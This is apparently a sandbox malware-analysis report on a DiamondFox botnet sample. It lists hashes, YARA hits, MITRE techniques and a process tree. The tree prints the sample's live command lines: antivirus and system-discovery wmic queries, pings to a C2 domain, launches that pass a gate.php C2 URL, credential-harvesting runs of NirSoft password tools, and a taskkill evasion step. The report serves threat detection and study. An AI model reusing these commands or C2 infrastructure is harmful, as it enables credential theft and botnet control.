diamondfox | 71c7eb818509ce499f6f870cd785d5b215a264e2d28e9606b1ba6b955bd2b9d4

Analysis

max time kernel
111s
max time network
108s
platform
windows7_x64
resource
win7v20201028
submitted
09/02/2021, 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1B59.tmp.bin.exe
Size

376KB
MD5

160844e5811ca8258e61cf44bf8587e5
SHA1

215bfc756f944e36c53e73e4be99c68b8d36df04
SHA256

f0498105de4bca70065bac976d8da9cb153a174dedbf0e3d932abae2eb94f152
SHA512

e92082ad2a68292622c2cff0ea7d77e034c1c4118947dcf6c3cf390aa21f03c0cd72602a41f896534af5cfec3087d6e0e7a1a9b6ce3f88a9d468ec910a0048a8

Score

10^/10

diamondfox botnet discovery ransomware spyware stealer

Malware Config

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 2 IoCs

Detects DiamondFox payload in file/memory.

resource	yara_rule
behavioral1/memory/2028-4-0x0000000000400000-0x0000000002955000-memory.dmp	diamondfox
behavioral1/memory/740-11-0x0000000000400000-0x0000000002955000-memory.dmp	diamondfox

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/1340-37-0x000000000044412E-mapping.dmp	MailPassView
behavioral1/memory/1340-36-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView
behavioral1/memory/1340-40-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1148-22-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView
behavioral1/memory/1148-23-0x00000000004466F4-mapping.dmp	WebBrowserPassView
behavioral1/memory/1148-26-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

resource	yara_rule
behavioral1/memory/1148-22-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/1148-23-0x00000000004466F4-mapping.dmp	Nirsoft
behavioral1/memory/1148-26-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/1340-37-0x000000000044412E-mapping.dmp	Nirsoft
behavioral1/memory/1340-36-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft
behavioral1/memory/1340-40-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft
behavioral1/memory/1396-41-0x0000000000400000-0x0000000000488000-memory.dmp	Nirsoft
behavioral1/memory/1396-42-0x000000000040190A-mapping.dmp	Nirsoft
behavioral1/memory/1396-45-0x0000000000400000-0x0000000000488000-memory.dmp	Nirsoft

Executes dropped EXE 12 IoCs

pid	Process
740	MicrosoftEdgeCPS.exe
1148	MicrosoftEdgeCPS.exe
1644	MicrosoftEdgeCPS.exe
1576	MicrosoftEdgeCPS.exe
1340	MicrosoftEdgeCPS.exe
1396	MicrosoftEdgeCPS.exe
1612	MicrosoftEdgeCPS.exe
1416	MicrosoftEdgeCPS.exe
1120	MicrosoftEdgeCPS.exe
576	MicrosoftEdgeCPS.exe
1344	MicrosoftEdgeCPS.exe
1488	MicrosoftEdgeCPS.exe

Loads dropped DLL 10 IoCs

pid	Process
2028	1B59.tmp.bin.exe
2028	1B59.tmp.bin.exe
740	MicrosoftEdgeCPS.exe
872	WerFault.exe
872	WerFault.exe
872	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 740 set thread context of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 set thread context of 1644	740	MicrosoftEdgeCPS.exe	47
PID 740 set thread context of 1576	740	MicrosoftEdgeCPS.exe	48
PID 740 set thread context of 1340	740	MicrosoftEdgeCPS.exe	49
PID 740 set thread context of 1396	740	MicrosoftEdgeCPS.exe	50
PID 740 set thread context of 1612	740	MicrosoftEdgeCPS.exe	51
PID 740 set thread context of 1416	740	MicrosoftEdgeCPS.exe	52
PID 740 set thread context of 1120	740	MicrosoftEdgeCPS.exe	53
PID 740 set thread context of 576	740	MicrosoftEdgeCPS.exe	54
PID 740 set thread context of 1344	740	MicrosoftEdgeCPS.exe	55
PID 1416 set thread context of 1900	1416	MicrosoftEdgeCPS.exe	56
PID 740 set thread context of 1488	740	MicrosoftEdgeCPS.exe	60

Program crash 2 IoCs

pid	pid_target	Process	procid_target
872	1416	WerFault.exe	52
1916	1344	WerFault.exe	55

Kills process with taskkill 1 IoCs

evasion

pid	Process
1988	taskkill.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
740	MicrosoftEdgeCPS.exe
1148	MicrosoftEdgeCPS.exe
1148	MicrosoftEdgeCPS.exe
1396	MicrosoftEdgeCPS.exe
1396	MicrosoftEdgeCPS.exe
1396	MicrosoftEdgeCPS.exe
1396	MicrosoftEdgeCPS.exe
1344	MicrosoftEdgeCPS.exe
872	WerFault.exe
872	WerFault.exe
872	WerFault.exe
872	WerFault.exe
872	WerFault.exe
740	MicrosoftEdgeCPS.exe
1916	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1120	wmic.exe
Token: SeSecurityPrivilege	1120	wmic.exe
Token: SeTakeOwnershipPrivilege	1120	wmic.exe
Token: SeLoadDriverPrivilege	1120	wmic.exe
Token: SeSystemProfilePrivilege	1120	wmic.exe
Token: SeSystemtimePrivilege	1120	wmic.exe
Token: SeProfSingleProcessPrivilege	1120	wmic.exe
Token: SeIncBasePriorityPrivilege	1120	wmic.exe
Token: SeCreatePagefilePrivilege	1120	wmic.exe
Token: SeBackupPrivilege	1120	wmic.exe
Token: SeRestorePrivilege	1120	wmic.exe
Token: SeShutdownPrivilege	1120	wmic.exe
Token: SeDebugPrivilege	1120	wmic.exe
Token: SeSystemEnvironmentPrivilege	1120	wmic.exe
Token: SeRemoteShutdownPrivilege	1120	wmic.exe
Token: SeUndockPrivilege	1120	wmic.exe
Token: SeManageVolumePrivilege	1120	wmic.exe
Token: 33	1120	wmic.exe
Token: 34	1120	wmic.exe
Token: 35	1120	wmic.exe
Token: SeIncreaseQuotaPrivilege	1120	wmic.exe
Token: SeSecurityPrivilege	1120	wmic.exe
Token: SeTakeOwnershipPrivilege	1120	wmic.exe
Token: SeLoadDriverPrivilege	1120	wmic.exe
Token: SeSystemProfilePrivilege	1120	wmic.exe
Token: SeSystemtimePrivilege	1120	wmic.exe
Token: SeProfSingleProcessPrivilege	1120	wmic.exe
Token: SeIncBasePriorityPrivilege	1120	wmic.exe
Token: SeCreatePagefilePrivilege	1120	wmic.exe
Token: SeBackupPrivilege	1120	wmic.exe
Token: SeRestorePrivilege	1120	wmic.exe
Token: SeShutdownPrivilege	1120	wmic.exe
Token: SeDebugPrivilege	1120	wmic.exe
Token: SeSystemEnvironmentPrivilege	1120	wmic.exe
Token: SeRemoteShutdownPrivilege	1120	wmic.exe
Token: SeUndockPrivilege	1120	wmic.exe
Token: SeManageVolumePrivilege	1120	wmic.exe
Token: 33	1120	wmic.exe
Token: 34	1120	wmic.exe
Token: 35	1120	wmic.exe
Token: SeIncreaseQuotaPrivilege	1028	wmic.exe
Token: SeSecurityPrivilege	1028	wmic.exe
Token: SeTakeOwnershipPrivilege	1028	wmic.exe
Token: SeLoadDriverPrivilege	1028	wmic.exe
Token: SeSystemProfilePrivilege	1028	wmic.exe
Token: SeSystemtimePrivilege	1028	wmic.exe
Token: SeProfSingleProcessPrivilege	1028	wmic.exe
Token: SeIncBasePriorityPrivilege	1028	wmic.exe
Token: SeCreatePagefilePrivilege	1028	wmic.exe
Token: SeBackupPrivilege	1028	wmic.exe
Token: SeRestorePrivilege	1028	wmic.exe
Token: SeShutdownPrivilege	1028	wmic.exe
Token: SeDebugPrivilege	1028	wmic.exe
Token: SeSystemEnvironmentPrivilege	1028	wmic.exe
Token: SeRemoteShutdownPrivilege	1028	wmic.exe
Token: SeUndockPrivilege	1028	wmic.exe
Token: SeManageVolumePrivilege	1028	wmic.exe
Token: 33	1028	wmic.exe
Token: 34	1028	wmic.exe
Token: 35	1028	wmic.exe
Token: SeIncreaseQuotaPrivilege	1028	wmic.exe
Token: SeSecurityPrivilege	1028	wmic.exe
Token: SeTakeOwnershipPrivilege	1028	wmic.exe
Token: SeLoadDriverPrivilege	1028	wmic.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1644	MicrosoftEdgeCPS.exe
1120	MicrosoftEdgeCPS.exe
576	MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2028 wrote to memory of 740	2028	1B59.tmp.bin.exe	29
PID 2028 wrote to memory of 740	2028	1B59.tmp.bin.exe	29
PID 2028 wrote to memory of 740	2028	1B59.tmp.bin.exe	29
PID 2028 wrote to memory of 740	2028	1B59.tmp.bin.exe	29
PID 740 wrote to memory of 1120	740	MicrosoftEdgeCPS.exe	31
PID 740 wrote to memory of 1120	740	MicrosoftEdgeCPS.exe	31
PID 740 wrote to memory of 1120	740	MicrosoftEdgeCPS.exe	31
PID 740 wrote to memory of 1120	740	MicrosoftEdgeCPS.exe	31
PID 740 wrote to memory of 1028	740	MicrosoftEdgeCPS.exe	33
PID 740 wrote to memory of 1028	740	MicrosoftEdgeCPS.exe	33
PID 740 wrote to memory of 1028	740	MicrosoftEdgeCPS.exe	33
PID 740 wrote to memory of 1028	740	MicrosoftEdgeCPS.exe	33
PID 740 wrote to memory of 1472	740	MicrosoftEdgeCPS.exe	36
PID 740 wrote to memory of 1472	740	MicrosoftEdgeCPS.exe	36
PID 740 wrote to memory of 1472	740	MicrosoftEdgeCPS.exe	36
PID 740 wrote to memory of 1472	740	MicrosoftEdgeCPS.exe	36
PID 740 wrote to memory of 2020	740	MicrosoftEdgeCPS.exe	38
PID 740 wrote to memory of 2020	740	MicrosoftEdgeCPS.exe	38
PID 740 wrote to memory of 2020	740	MicrosoftEdgeCPS.exe	38
PID 740 wrote to memory of 2020	740	MicrosoftEdgeCPS.exe	38
PID 740 wrote to memory of 1768	740	MicrosoftEdgeCPS.exe	40
PID 740 wrote to memory of 1768	740	MicrosoftEdgeCPS.exe	40
PID 740 wrote to memory of 1768	740	MicrosoftEdgeCPS.exe	40
PID 740 wrote to memory of 1768	740	MicrosoftEdgeCPS.exe	40
PID 740 wrote to memory of 1688	740	MicrosoftEdgeCPS.exe	42
PID 740 wrote to memory of 1688	740	MicrosoftEdgeCPS.exe	42
PID 740 wrote to memory of 1688	740	MicrosoftEdgeCPS.exe	42
PID 740 wrote to memory of 1688	740	MicrosoftEdgeCPS.exe	42
PID 740 wrote to memory of 976	740	MicrosoftEdgeCPS.exe	44
PID 740 wrote to memory of 976	740	MicrosoftEdgeCPS.exe	44
PID 740 wrote to memory of 976	740	MicrosoftEdgeCPS.exe	44
PID 740 wrote to memory of 976	740	MicrosoftEdgeCPS.exe	44
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1148	740	MicrosoftEdgeCPS.exe	46
PID 740 wrote to memory of 1644	740	MicrosoftEdgeCPS.exe	47
PID 740 wrote to memory of 1644	740	MicrosoftEdgeCPS.exe	47
PID 740 wrote to memory of 1644	740	MicrosoftEdgeCPS.exe	47
PID 740 wrote to memory of 1644	740	MicrosoftEdgeCPS.exe	47
PID 740 wrote to memory of 1644	740	MicrosoftEdgeCPS.exe	47
PID 740 wrote to memory of 1644	740	MicrosoftEdgeCPS.exe	47
PID 740 wrote to memory of 1644	740	MicrosoftEdgeCPS.exe	47
PID 740 wrote to memory of 1644	740	MicrosoftEdgeCPS.exe	47
PID 740 wrote to memory of 1576	740	MicrosoftEdgeCPS.exe	48
PID 740 wrote to memory of 1576	740	MicrosoftEdgeCPS.exe	48
PID 740 wrote to memory of 1576	740	MicrosoftEdgeCPS.exe	48
PID 740 wrote to memory of 1576	740	MicrosoftEdgeCPS.exe	48
PID 740 wrote to memory of 1576	740	MicrosoftEdgeCPS.exe	48
PID 740 wrote to memory of 1340	740	MicrosoftEdgeCPS.exe	49
PID 740 wrote to memory of 1340	740	MicrosoftEdgeCPS.exe	49
PID 740 wrote to memory of 1340	740	MicrosoftEdgeCPS.exe	49
PID 740 wrote to memory of 1340	740	MicrosoftEdgeCPS.exe	49
PID 740 wrote to memory of 1340	740	MicrosoftEdgeCPS.exe	49
PID 740 wrote to memory of 1340	740	MicrosoftEdgeCPS.exe	49
PID 740 wrote to memory of 1340	740	MicrosoftEdgeCPS.exe	49
PID 740 wrote to memory of 1340	740	MicrosoftEdgeCPS.exe	49
PID 740 wrote to memory of 1340	740	MicrosoftEdgeCPS.exe	49

C:\Users\Admin\AppData\Local\Temp\1B59.tmp.bin.exe
"C:\Users\Admin\AppData\Local\Temp\1B59.tmp.bin.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028
- C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
  "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1120
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" os get caption /FORMAT:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1028
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_VideoController get caption /FORMAT:List
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get StatusCode /FORMAT:List
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get ResponseTime /FORMAT:List
    3⤵
    PID:976
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\1.log"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1148
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\4.log"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1644
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\2.log"
    3⤵
    - Executes dropped EXE
    PID:1576
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\3.log"
    3⤵
    - Executes dropped EXE
    PID:1340
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /VisitTimeFilterType 2 /VisitTimeFilterValue 6 /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\6.log"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1396
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\5.log"
    3⤵
    - Executes dropped EXE
    PID:1612
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1416
  - - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
      X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      4⤵
      PID:1900
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 100
      4⤵
      Loads dropped DLL
      Program crash
      Suspicious behavior: EnumeratesProcesses
      PID:872
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1120
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:576
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1344
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /PID 1900 /F
      4⤵
      Kills process with taskkill
      PID:1988
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 272
      4⤵
      Loads dropped DLL
      Program crash
      Suspicious behavior: EnumeratesProcesses
      PID:1916
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    PID:1488
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get StatusCode /FORMAT:List
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get ResponseTime /FORMAT:List
    3⤵
    PID:1204

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/576-77-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/576-58-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/740-10-0x00000000043C0000-0x0000000006915000-memory.dmp

Filesize
37.3MB

Download
memory/740-11-0x0000000000400000-0x0000000002955000-memory.dmp

Filesize
37.3MB

Download
memory/872-79-0x0000000001F70000-0x0000000001F81000-memory.dmp

Filesize
68KB

Download
memory/872-89-0x00000000004F0000-0x00000000004F1000-memory.dmp

Filesize
4KB

Download
memory/872-81-0x0000000001F70000-0x0000000001F81000-memory.dmp

Filesize
68KB

Download
memory/872-84-0x0000000002500000-0x0000000002511000-memory.dmp

Filesize
68KB

Download
memory/1080-12-0x000007FEF6B90000-0x000007FEF6E0A000-memory.dmp

Filesize
2.5MB

Download
memory/1120-72-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1120-52-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1148-22-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1148-26-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1340-36-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/1340-40-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/1344-64-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1344-75-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1396-41-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/1396-45-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/1416-71-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/1416-49-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/1644-33-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1644-28-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1900-74-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1900-65-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1916-91-0x0000000001E00000-0x0000000001E11000-memory.dmp

Filesize
68KB

Download
memory/1916-100-0x0000000001C70000-0x0000000001C71000-memory.dmp

Filesize
4KB

Download
memory/2028-2-0x00000000042D0000-0x0000000006825000-memory.dmp

Filesize
37.3MB

Download
memory/2028-4-0x0000000000400000-0x0000000002955000-memory.dmp

Filesize
37.3MB

Download
memory/2028-3-0x0000000075C31000-0x0000000075C33000-memory.dmp

Filesize
8KB

Download